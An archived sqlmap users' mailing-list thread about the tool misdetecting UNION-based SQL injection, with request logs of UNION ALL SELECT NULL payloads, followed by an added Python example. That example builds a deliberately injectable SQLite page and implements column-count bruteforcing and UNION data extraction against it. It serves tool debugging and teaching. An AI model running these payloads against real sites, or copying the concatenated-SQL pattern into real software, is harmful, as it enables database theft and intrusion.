Re: [sqlmap-users] Bug with union test?
From: Bernardo D. A. G. <ber...@gm...> - 2010-05-20 09:04:16
UNION query SQL injection by its nature "appends" your injected query output to the original SELECT statement. It might occur that this (--union-test / --union-use) changes the HTTP responses a lot, so sqlmap is no longer able to distinguish whether the test succeeds or not. This is yet another problem in the detection engine and, once again, it will be fixed (hopefully) when we rewrite the detection engine from scratch. All, in the meanwhile check the SQL injection yourself manually via a browser, maybe passing through a proxy (Burp is my choice) so you can easily repeat requests, compare responses, etc. Then spot a string (or regexp) to be used afterwards in sqlmap (--string or --regexp) and, as you've seen David, this solves the problem.

Bernardo

On Mon, May 10, 2010 at 17:55, David Guimaraes <sk...@gm...> wrote:
> Hmm.. seems to work through the --string parameter...
>
> So I have to pass the --string parameter whenever I use the union
> technique for sqlmap to identify it correctly!?!
>
>
> On Mon, May 10, 2010 at 11:09 AM, Bernardo Damele A. G.
> <ber...@gm...> wrote:
>> For me it works with no problems against SQL injection on a SELECT with
>> more than one column.
>> Try to provide sqlmap with --string or --regex. Also, try with
>> --union-tech orderby.
>>
>> Bernardo
>>
>>
>> On Sun, May 9, 2010 at 21:33, David Guimaraes <sk...@gm...> wrote:
>>> I noticed that this has already been happening for some time: sqlmap
>>> fails to properly detect UNION inband SQL injection, even in cases
>>> where the detection is quite simple, as shown below:
>>>
>>> http://www.vulnsite.com/vulnscript.php?id=42 and 1 = 0 union all
>>> select 1,2,3,4,5,6 (mysql)
>>>
>>> I am currently editing the session file directly to use the UNION
>>> technique with sqlmap.
>>>
>>> By using --union-test and verbose level 2, it was possible to
>>> identify that sqlmap does not completely test the NULL bruteforcing
>>> UNION technique. It tests only a single column, and reports that it
>>> has found the flaw, as shown below:
>>>
>>> [16:58:09] [INFO] testing inband sql injection on parameter 'id' with
>>> NULL bruteforcing technique
>>> [16:58:09] [TRAFFIC OUT] HTTP request:
>>> GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL%23%20AND%203967=3967
>>> HTTP/1.1
>>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>>> Host: www.vulnsite.com
>>> Accept-language: en-us,en;q=0.5
>>> Cookie:
>>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net)
>>> Connection: close
>>>
>>> [16:58:10] [INFO] confirming full inband sql injection on parameter 'id'
>>> [16:58:10] [TRAFFIC OUT] HTTP request:
>>> GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL%23%20AND%204073=4073
>>> HTTP/1.1
>>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>>> Host: www.vulnsite.com
>>> Accept-language: en-us,en;q=0.5
>>> Cookie:
>>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net)
>>> Connection: close
>>>
>>> [16:58:10] [WARNING] the target url is not affected by an exploitable
>>> full inband sql injection vulnerability
>>> [16:58:10] [INFO] confirming partial (single entry) inband sql
>>> injection on parameter 'id' by appending a false condition after the
>>> parameter value
>>> [16:58:11] [TRAFFIC OUT] HTTP request:
>>> GET /vulnscript.php?id=42%20AND%206261=6262%20UNION%20ALL%20SELECT%20NULL%23%20AND%206194=6194
>>> HTTP/1.1
>>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>>> Host: www.vulnsite.com
>>> Accept-language: en-us,en;q=0.5
>>> Cookie:
>>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net)
>>> Connection: close
>>>
>>> [16:58:11] [WARNING] the target url is not affected by an exploitable
>>> partial (single entry) inband sql injection vulnerability
>>> [16:58:11] [INFO] confirming partial (single entry) inband sql
>>> injection on parameter 'id' with negative parameter value
>>> [16:58:11] [TRAFFIC OUT] HTTP request:
>>> GET /vulnscript.php?id=-42%20UNION%20ALL%20SELECT%20NULL%23%20AND%204970=4970
>>> HTTP/1.1
>>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>>> Host: www.vulnsite.com
>>> Accept-language: en-us,en;q=0.5
>>> Cookie:
>>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net)
>>> Connection: close
>>>
>>> [16:58:12] [WARNING] the target url is not affected by an exploitable
>>> partial (single entry) inband sql injection vulnerability
>>> valid union: None
>>>
>>> The sqlmap documentation says: "By default sqlmap uses the NULL
>>> bruteforcing technique to detect the number of columns within the
>>> original SELECT statement."
>>>
>>> I think the correct use of the brute force technique would be to test
>>> several columns until it finds the correct number. Right?
>>>
>>> --
>>> David Gomes Guimarães
>>>
>>> ------------------------------------------------------------------------------
>>>
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>>
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>> PGP Key ID: 0x05F5A30F
>>
>
>
>
> --
> David Gomes Guimarães
>

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
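The two things the thread is about, NULL bruteforcing of the column count (one NULL, then two, and so on until the UNION stops failing) and deciding success with an explicit --string/--regexp-style match instead of page comparison, as an added, self-contained Python example. This is not sqlmap's code and not part of the original thread. It assumes a constructed in-memory SQLite stand-in for the vulnerable page (the thread's target is MySQL, so the comment sequence and the concatenation operator are SQLite's `-- ` and `||` rather than `#` and CONCAT()); the table, the sample rows, the `sqlm…x`/`sqlmA`/`sqlmZ` markers and all helper names are this example's own.

```python
import re
import sqlite3

# Constructed stand-in for the thread's vulnerable page: an in-memory SQLite
# database and a handler that concatenates the id parameter into the SQL.
_db = sqlite3.connect(":memory:", check_same_thread=False)
_db.executescript("""
CREATE TABLE items(id INTEGER, name TEXT, price REAL, note TEXT);
INSERT INTO items VALUES (41, 'bolt', 0.10, 'steel');
INSERT INTO items VALUES (42, 'nut',  0.05, 'brass');
""")


def vulnerable_page(id_value: str) -> str:
    """Render the page the way the flawed application would.

    The SELECT has four columns but only two of them (name, note) reach the
    HTML, which is what sqlmap calls a 'partial' inband injection.
    """
    sql = "SELECT id, name, price, note FROM items WHERE id=" + id_value
    try:
        rows = _db.execute(sql).fetchall()
    except sqlite3.Error:
        # A UNION with the wrong column count fails here; the application
        # swallows the detail and serves a generic error page instead.
        return "<html><body><h1>Something went wrong</h1></body></html>"
    items = "".join(f"<li>{name} ({note})</li>" for _id, name, _price, note in rows)
    return f"<html><body><ul>{items}</ul></body></html>"


def union_column_count(page, base_id, match, max_cols=20, comment="-- "):
    """NULL-bruteforce the column count of the original SELECT.

    `match` plays the role of sqlmap's --string/--regexp: a response is
    treated as 'true' when it matches, so it must be something the original
    page shows and the error page does not.  Returns the count, or None if
    no count up to max_cols produced a matching page.
    """
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        payload = f"{base_id} UNION ALL SELECT {nulls}{comment}"
        if re.search(match, page(payload)):
            return n
    return None


def reflected_columns(page, base_id, ncols, comment="-- "):
    """Find which UNION columns are rendered, using the negative-id variant
    seen in the thread (-42 UNION ALL SELECT ...): the original SELECT then
    returns no row, so only the injected row, tagged with a unique marker per
    column, reaches the page.  Returns the 1-based column positions."""
    markers = [f"sqlm{i}x" for i in range(1, ncols + 1)]
    cols = ",".join(f"'{m}'" for m in markers)
    html = page(f"-{base_id} UNION ALL SELECT {cols}{comment}")
    return [i for i, m in enumerate(markers, start=1) if m in html]


def union_extract(page, base_id, ncols, column, expression, comment="-- "):
    """Read one SQL expression back through a reflected column, wrapped in
    markers so the value can be cut out of the surrounding HTML."""
    cols = ["NULL"] * ncols
    cols[column - 1] = f"'sqlmA'||({expression})||'sqlmZ'"   # SQLite concat
    html = page(f"-{base_id} UNION ALL SELECT {','.join(cols)}{comment}")
    found = re.search(r"sqlmA(.*?)sqlmZ", html, re.S)
    return found.group(1) if found else None


if __name__ == "__main__":
    n = union_column_count(vulnerable_page, "42", "brass")
    print("columns:", n)
    print("reflected:", reflected_columns(vulnerable_page, "42", n))
    print("version:", union_extract(vulnerable_page, "42", n, 2, "sqlite_version()"))
```

The `match` argument is the whole point of Bernardo's advice: the three NULL-mismatch requests and the successful four-NULL request produce pages that differ far more than the original page differs from itself, so a tool comparing responses against a baseline has nothing stable to key on, whereas a string that only the real page contains ("brass" here) gives an unambiguous true/false oracle. Pick it the way the thread suggests, by replaying the requests through a proxy and looking at what survives in the successful response and is absent from the error page.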